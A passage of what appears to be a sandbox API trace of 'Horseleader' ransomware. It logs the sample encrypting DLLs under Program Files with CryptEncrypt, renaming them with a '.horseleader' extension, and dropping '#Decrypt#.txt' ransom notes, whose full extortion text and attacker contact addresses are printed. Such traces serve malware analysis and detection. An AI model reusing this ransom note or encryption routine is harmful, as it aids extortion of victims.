lpSrch=".horseleader") returned 0x0 [0248.780] lstrcmpW (lpString1="MSB1XTOR.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.780] lstrcmpW (lpString1="MSB1XTOR.DLL", lpString2="_uninstalling_.png") returned 1 [0248.780] lstrlenW (lpString=".testttjffg") returned 11 [0248.780] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL", lpSrch=".testttjffg") returned 0x0 [0248.780] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.780] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1xtor.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.845] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL") returned 72 [0248.845] StrStrW (lpFirst="MSB1XTOR.DLL", lpSrch=".txt") returned 0x0 [0248.845] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=70544) returned 1 [0248.845] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.845] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.874] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.874] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.874] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x61c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.874] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.888] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.888] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.888] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc390, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.888] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.889] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.889] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.889] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.889] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.889] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.889] CloseHandle (hObject=0x158) returned 1 [0248.889] GetProcessHeap () returned 0x780000 [0248.890] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.890] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL.horseleader") returned 84 [0248.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1xtor.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1xtor.dll.horseleader")) returned 1 [0248.891] GetProcessHeap () returned 0x780000 [0248.891] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.891] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44a7300, ftCreationTime.dwHighDateTime=0x1c3af23, ftLastAccessTime.dwLowDateTime=0x5ba5ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb44a7300, ftLastWriteTime.dwHighDateTime=0x1c3af23, nFileSizeHigh=0x0, nFileSizeLow=0x36000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WTSP61MS.DLL", cAlternateFileName="")) returned 1 [0248.891] lstrcmpiW (lpString1="WTSP61MS.DLL", lpString2="Windows") returned 1 [0248.891] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL") returned 72 [0248.891] StrStrIW (lpFirst="WTSP61MS.DLL", lpSrch=".horseleader") returned 0x0 [0248.891] lstrcmpW (lpString1="WTSP61MS.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.891] lstrcmpW (lpString1="WTSP61MS.DLL", lpString2="_uninstalling_.png") returned 1 [0248.891] lstrlenW (lpString=".testttjffg") returned 11 [0248.892] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL", lpSrch=".testttjffg") returned 0x0 [0248.892] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.892] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\wtsp61ms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.893] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL") returned 72 [0248.893] StrStrW (lpFirst="WTSP61MS.DLL", lpSrch=".txt") returned 0x0 [0248.893] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=221184) returned 1 [0248.893] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.893] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.897] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.897] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.898] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x18800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.898] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.917] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.917] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.917] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x31000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.917] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0249.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0249.187] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0249.188] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.188] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0249.188] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0249.188] CloseHandle (hObject=0x158) returned 1 [0249.188] GetProcessHeap () returned 0x780000 [0249.188] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0249.188] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL.horseleader") returned 84 [0249.189] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\wtsp61ms.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\wtsp61ms.dll.horseleader")) returned 1 [0249.190] GetProcessHeap () returned 0x780000 [0249.190] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0249.190] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44a7300, ftCreationTime.dwHighDateTime=0x1c3af23, ftLastAccessTime.dwLowDateTime=0x5ba5ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb44a7300, ftLastWriteTime.dwHighDateTime=0x1c3af23, nFileSizeHigh=0x0, nFileSizeLow=0x36000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WTSP61MS.DLL", cAlternateFileName="")) returned 0 [0249.190] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0249.190] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\#Decrypt#.txt") returned 73 [0249.190] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0249.190] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0249.191] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0249.192] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0249.192] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0249.192] CloseHandle (hObject=0x21c) returned 1 [0249.192] GetProcessHeap () returned 0x780000 [0249.192] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0249.192] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Triedit", cAlternateFileName="")) returned 1 [0249.192] lstrcmpiW (lpString1="Triedit", lpString2="Windows") returned -1 [0249.192] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit") returned 58 [0249.192] lstrcmpW (lpString1="Triedit", lpString2=".") returned 1 [0249.192] lstrcmpW (lpString1="Triedit", lpString2="..") returned 1 [0249.193] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0249.193] GetProcessHeap () returned 0x780000 [0249.193] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0249.193] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*") returned 60 [0249.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0249.193] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0249.193] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\.") returned 60 [0249.194] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0249.194] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0249.194] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0249.194] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\..") returned 61 [0249.194] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0249.194] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0249.194] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0249.194] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0249.194] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US") returned 64 [0249.194] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0249.194] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0249.194] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0249.194] GetProcessHeap () returned 0x780000 [0249.194] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0249.195] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*") returned 66 [0249.195] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0249.196] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0249.196] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\.") returned 66 [0249.196] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0249.196] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="..", cAlternateFileName="")) returned 1 [0249.196] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0249.196] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\..") returned 67 [0249.196] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0249.196] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0249.196] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2160207, dwReserved1=0x6ae8d8f4, cFileName="..", cAlternateFileName="")) returned 0 [0249.196] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0249.196] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\#Decrypt#.txt") returned 78 [0249.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0249.197] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find 